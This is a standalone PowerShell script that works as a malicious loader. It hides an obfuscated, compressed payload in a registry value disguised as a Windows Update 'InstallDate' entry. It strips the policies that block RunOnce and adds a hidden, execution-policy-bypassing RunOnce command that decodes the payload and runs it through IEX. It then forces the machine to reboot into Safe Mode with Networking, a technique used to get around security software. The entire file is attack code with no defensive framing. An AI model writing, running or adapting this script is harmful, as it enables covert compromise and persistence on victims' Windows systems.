if(!([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(544)){Exit 1}
$B="tVZbb+JGFP4rU8vqQmXT3LYPa1laLyFtBAkIk0RtiFaDfQizDDPuzBgWsfz3nvGFmG52VantA2Z87pfvnLHbC52YcRCGb7tSGCZycAK3p5RUUWKYFCMFc1AgEgjdXhClqT/ZZkCK5yXMmWBWirzJNRPPJN5qA6ug+dIZ52h3BZ1rYUDJLAa1ZgnoIMtnnCUk4VRrMtk9XnJ+vcqkMi2HpmuasfOzTsq548VgBlSbIqjQqBzaT8zaEpQTbahBI/DZvpOZlJxE6adcm4lcAgbP1pjdM+gWeh8ZRRZeIZN6mBYZEOGhJcK9ipvVB9UOmvEs0TjwKp5veq90fwXTzRWWzIyUxER169jYv0pumNmsCrNFhi952URokVadzH/odiDlMs8O5bynPIeWNsq2eeFVB1F45xKP1neMZhP0spW5aZV/fSbSTgx/5lgcRrk3oskyPD1ybXXIYFeBwybVrZFSWL4LGqwo2FdvVcxryVLSqyPL2jujtrsBMaGADRlgI+pyheWh8wdCMviqqK+00Ls4KdJbtAPT6Yan+LwLT/AZhWfBq+UROedeViihbDt4HZcLb065hlLMO/EacTXP7WCfUJMsdvv9/k3wOHl6967XcmKY0CUMNwKUXrCXAJx2Q2QM2kgFTaYbh7ew8YezT4DVruY0hiRXzGw7KCkSllF+IF2ntmFzBgoN+qf+W//8zH97cWFNRaEbdyaKCs2pgdbjt63dTqIkkbgNnlDtPnQemMANAiJ1PAxTaMD/h/SKcQRDcbxlOl4n9fFSrfG40YkuaPGzWn1QWE1VvUTPGCSeby67mG6puIGZWSigJoV5rrFKpap11hUJNvfz1gnmKE6TRcvVCCri3rd3bhY6v/UHN++m8e/xpHczrdBgV6SSHIdnWq+xqaudgM1bE6yyP6JmQdwKdm4/fLxhiZJazk0Hk8XZG8MzQ3BusTcDmVB+g36ZgI5FYJzP+rBtuVkHTyWCW7+0PWcMNH3AUgKSJwpslY66bpvQDd1+B1GLBUa0VmG2LAMbYQrRlhvhe9++H0u53YLe5VKDVfn/wu4uqHiGEagV0xpvDf3d0Mffw+iR9CG+kjrOOWC2nnOFE1iJON6559xKYcOIOJcbpy5OU2f8jyqEfP8ao0H4ZKDMltR9J/4tXQFxYkOVcYhf7AFyUV6W5PJBqpT4vYjERmYv44y5+3GygBRDSCdUL1Een4VNZ3poxRRbkcqNrv9JOTugpj85hVW39+WSaTrjcGwucEenBzgPryYP0bg3HUncmgzh+5X9g138DhidhQ5qT7GX3J/gJU4wZwPFh4Fln5fsONsKMJZw6qEO/s6/XEnVQ5RU/dvhhPzQnJGP7fbOttfWsa7fR+KjVgJfhrnxb7F3+33gDsP3O5vA+51TZRfhKkKPG6rAwT1ck22M9jvjRuInibQwbHKt0j1TuS6I1fD2AbKIszXaOdkX2b54+QALumZSvW5uKEqENMrR4MYJFUNRB9QTltbkXw+j+yPNfVFLdF5Wcgz2yi5cnmCw+WzFTExXGQcLSW3XXHiGxTksrmWxuIYdHETd3h3I65L86C6fKta3oLusoIsqFWpLtUd3/dSELzodw0qu4TUrf8fY19Ct1ug9Li5MfHonmMCLm/Na4C5L8Q5x6jm6LrmXJa2AePAjmSUppMx04DOQn1PgYGBdhOzsktL+3iGazgG/XExgbz+cRr8rV1mOF0uFsb8A"
$R="HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WindowsUpdate"
if(!(Test-Path $R)){New-Item -Path $R -Force|Out-Null}
Set-ItemProperty -Path $R -Name "InstallDate" -Value $B -Type String -EA "SilentlyContinue"
$G=@("HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer","HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer")
$G|ForEach-Object{if(Test-Path $_){Remove-ItemProperty -Path $_ -Name "DisableRunOnce" -EA "SilentlyContinue";Remove-ItemProperty -Path $_ -Name "DisableLocalMachineRunOnce" -EA "SilentlyContinue"}}
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" -Name "*x" -Value "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command `"`$P=(Get-ItemProperty '$R').InstallDate; `$M=New-Object IO.MemoryStream([Convert]::FromBase64String(`$P),0,`$P.Length); `$D=New-Object IO.Compression.DeflateStream(`$M,[IO.Compression.CompressionMode]::Decompress); `$S=New-Object IO.StreamReader(`$D); IEX `$S.ReadToEnd()`"" -EA "SilentlyContinue"
& bcdedit.exe /set "{current}" safeboot network|Out-Null
if($LASTEXITCODE -ne 0){Exit 1}
Restart-Computer -Force
